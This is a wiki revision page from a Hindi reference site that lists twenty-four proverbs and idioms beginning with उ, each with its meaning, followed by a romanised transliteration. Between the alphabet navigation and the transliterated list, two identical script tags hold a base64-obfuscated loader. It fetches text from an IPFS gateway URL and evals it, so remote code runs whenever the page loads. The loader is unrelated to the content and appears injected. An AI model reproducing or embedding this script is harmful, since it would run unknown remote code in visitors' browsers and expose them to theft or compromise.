Difference between revisions of "कहावत लोकोक्ति मुहावरे-उ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "{{कहावत लोकोक्ति मुहावरे}}" to "{{कहावत लोकोक्ति मुहावरे}}{{कहावत लोकोक्ति मुहावरे2}}")
 
(3 intermediate revisions by 2 users not shown)
Line 1: Line 1:
{{कहावत लोकोक्ति मुहावरे}}
+
{{कहावत लोकोक्ति मुहावरे}}{{कहावत लोकोक्ति मुहावरे2}}
  
{| width="100%" style="background:transparent;"
+
{| class="bharattable-pink"
|-valign="top"
+
|-
 +
! style="width:30%"| कहावत लोकोक्ति मुहावरे
 +
! style="width:70%"| अर्थ
 +
|-
 
|  
 
|  
* उत्रा उत्तर दै गयी, हस्त गयो मुख मोरि।<br />
+
1-उत्रा उत्तर दै गयी, हस्त गयो मुख मोरि। भली विचारी चित्तरा, परजा लेइ बहोरि।।
भली विचारी चित्तरा, परजा लेइ बहोरि।।
+
|
* उल्टा चोर कोतवाल को डाँटे।
+
अर्थ - उत्तर नक्षत्र ने जवाब दे दिया और हस्त नक्षत्र भी मुंह मोड़कर चला गया। चित्रा नक्षत्र ही अच्छा है जो कि प्रजा को बसा लेता है अर्थात् यदि उत्तरा और हस्त नक्षत्र में पानी न बरसे और चित्रा नक्षत्र में पानी बरस जाता है तो उपज अच्छी होती है।
* उँगली पकड़ते ही पहुँचा पकड़ना।
+
|-
* उतर गई लोई तो क्या करेगा कोई।
+
|2- उल्टा चोर कोतवाल को डाँटे।
* उत्तर जाएं कि दक्खिन, वही करम के लक्ख़न।
+
|
* उपजति एक संग जल माही,<br />
+
अर्थ - दोषी होने पर भी दोषी बताना।
जलज जोंक जिमि गुण विलगाही
+
|-
* उलटी गंगा पहाड़ चली।
+
|3- उँगली पकड़ते ही पहुँचा पकड़ना।
* उलटे बाँस बरेली को।
+
|
उँगलियों पर नाचना।
+
अर्थ - थोड़ा सा आसरा पाकर पूर्ण अधिकार पाने की हिम्मत बढ़ना।
उँगली उठाना।
+
|-
उगल देना।
+
|4- उगले तो अंधा, खाए तो कोढ़ी।
उड़ती चिड़िया पहचानना।
+
|
उड़न छू होना।
+
अर्थ - दुविधा में पड़ जाना।
उधार खाए बैठना।
+
|-
उधेड़ बुन में पड़ना / रहना।
+
|5- उतर गई लोई तो क्या करेगा कोई।
उन्नीस पड़ना या होना।
+
|
*  उन्नीस बिस्वा।
+
अर्थ - इज्ज़त न रहने पर आदमी निर्लज्ज हो जाता है, उसे मान अपमान का ध्यान नहीं रहता है।
उन्नीस-बीस होना।
+
|-
उबल पड़ना।
+
|6- उत्तर जाएं कि दक्खिन, वही करम के लक्ख़न।
उल्टी गंगा बहाना।
+
|
उल्टी पट्टी पढ़ाना।
+
अर्थ - भाग्य और  दुर्भाग्य  हर जगह साथ देता है, व्यक्ति कहीं भी रहे।
उल्टी माला फेरना।
+
|-
*  उल्टे छुरे से मूँड़ना।
+
|7- उपजति एक संग जल माही, जलज जोंक जिमि गुण विलगाही
 +
|
 +
अर्थ - एक पिता के बेटे भी एक जैसे नहीं होते अर्थात् मूल एक होने पर भी विभिन्नताएँ देखने को मिलती हैं।
 +
|-
 +
|8- उलटी गंगा पहाड़ चली।
 +
|
 +
अर्थ - असंभव या विपरीत बात होना, असंभव काम करने की कोशिश करना।
 +
|-
 +
|9- उलटे बाँस बरेली को।
 +
|
 +
अर्थ - विपरीत कार्य करना, असंभव काम करने की कोशिश करना।
 +
|-
 +
|10- उँगलियों पर नाचना।
 +
|
 +
अर्थ - किसी की इच्छाओं का तुरंत पालन करना।
 +
|-
 +
|11- उँगली उठाना।
 +
|
 +
अर्थ - निंदा करना।
 +
|-
 +
|12- उँगली पकड़ कर पहुँचा पकड़ना।
 +
|
 +
अर्थ - ज़रा सा सहारा मिलते ही कुछ और पाने की लालसा करना।
 +
|-
 +
|13- उगल देना।
 +
|
 +
अर्थ - भेद खोल देना।
 +
|-
 +
|14- उड़ती चिड़िया पहचानाना।
 +
|
 +
अर्थ - मन की बात ताड़ जाना।
 +
|-
 +
|15- उड़न छू होना।
 +
|
 +
अर्थ - गायब हो जाना।
 +
|-
 +
|16- उधार खाए बैठना।
 +
|
 +
अर्थ - हठ करना।
 +
|-
 +
|17- उधेड़ बुन में पड़ना / रहना।
 +
|
 +
अर्थ - सोच-विचार करते रहना।
 +
|-
 +
|18- उन्नीस पड़ना या होना।
 +
|
 +
अर्थ - कुछ घटकर होना।
 +
|-
 +
|19- उल्टे छुरे से मूँड़ना।
 +
|
 +
अर्थ - मूर्ख बनाकर ठग लेना।
 +
|-
 +
|20- उन्नीस-बीस होना।
 +
|
 +
अर्थ - बहुत थोड़ा अन्तर होना।
 +
|-
 +
|21- उबल पड़ना।
 +
|
 +
अर्थ - एकदम गुस्सा हो जाना।
 +
|-
 +
|22- उल्टी गंगा बहाना।
 +
|
 +
अर्थ - उल्टा काम करना।
 +
|-
 +
|23- उल्टी पट्टी पढ़ाना।
 +
|
 +
अर्थ - ग़लत कहकर बहकाना।
 +
|-
 +
|24- उल्टी माला फेरना।
 +
|
 +
अर्थ - अहित सोचना।
 +
 
 
|}
 
|}
 +
  
 
[[Category:कहावत_लोकोक्ति_मुहावरे]]
 
[[Category:कहावत_लोकोक्ति_मुहावरे]]
 
__INDEX__
 
__INDEX__
{{Theme pink}}
 

Latest revision as of 12:09, 20 April 2018

kahavat lokokti muhavare varnamala kramanusar khojean

a   a    i    ee    u    oo    e    ai    o   au    aan    k   kh    g    gh    ch    chh    j    jh    t    th    d   dh    t    th    d    dh    n    p    ph    b    bh    m    y    r    l    v    sh    sh    s    h    ksh    tr    shr

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


kahavat lokokti muhavare arth

1-utra uttar dai gayi, hast gayo mukh mori. bhali vichari chittara, paraja lei bahori..

arth - uttar nakshatr ne javab de diya aur hast nakshatr bhi muanh mo dakar chala gaya. chitra nakshatr hi achchha hai jo ki praja ko basa leta hai arthath yadi uttara aur hast nakshatr mean pani n barase aur chitra nakshatr mean pani baras jata hai to upaj achchhi hoti hai.

2- ulta chor kotaval ko daante.

arth - doshi hone par bhi doshi batana.

3- uangali pak date hi pahuancha pak dana.

arth - tho da sa asara pakar poorn adhikar pane ki himmat badhana.

4- ugale to aandha, khae to kodhi.

arth - duvidha mean p d jana.

5- utar gee loee to kya karega koee.

arth - ijzat n rahane par adami nirlajj ho jata hai, use man apaman ka dhyan nahian rahata hai.

6- uttar jaean ki dakkhin, vahi karam ke lakkhan.

arth - bhagy aur durbhagy har jagah sath deta hai, vyakti kahian bhi rahe.

7- upajati ek sang jal mahi, jalaj joank jimi gun vilagahi

arth - ek pita ke bete bhi ek jaise nahian hote arthath mool ek hone par bhi vibhinnataean dekhane ko milati haian.

8- ulati ganga paha d chali.

arth - asanbhav ya viparit bat hona, asanbhav kam karane ki koshish karana.

9- ulate baans bareli ko.

arth - viparit kary karana, asanbhav kam karane ki koshish karana.

10- uangaliyoan par nachana.

arth - kisi ki ichchhaoan ka turant palan karana.

11- uangali uthana.

arth - nianda karana.

12- uangali pak d kar pahuancha pak dana.

arth - zara sa sahara milate hi kuchh aur pane ki lalasa karana.

13- ugal dena.

arth - bhed khol dena.

14- u dati chi diya pahachanana.

arth - man ki bat ta d jana.

15- u dan chhoo hona.

arth - gayab ho jana.

16- udhar khae baithana.

arth - hath karana.

17- udhe d bun mean p dana / rahana.

arth - soch-vichar karate rahana.

18- unnis p dana ya hona.

arth - kuchh ghatakar hona.

19- ulte chhure se mooan dana.

arth - moorkh banakar thag lena.

20- unnis-bis hona.

arth - bahut tho da antar hona.

21- ubal p dana.

arth - ekadam gussa ho jana.

22- ulti ganga bahana.

arth - ulta kam karana.

23- ulti patti padhana.

arth - galat kahakar bahakana.

24- ulti mala pherana.

arth - ahit sochana.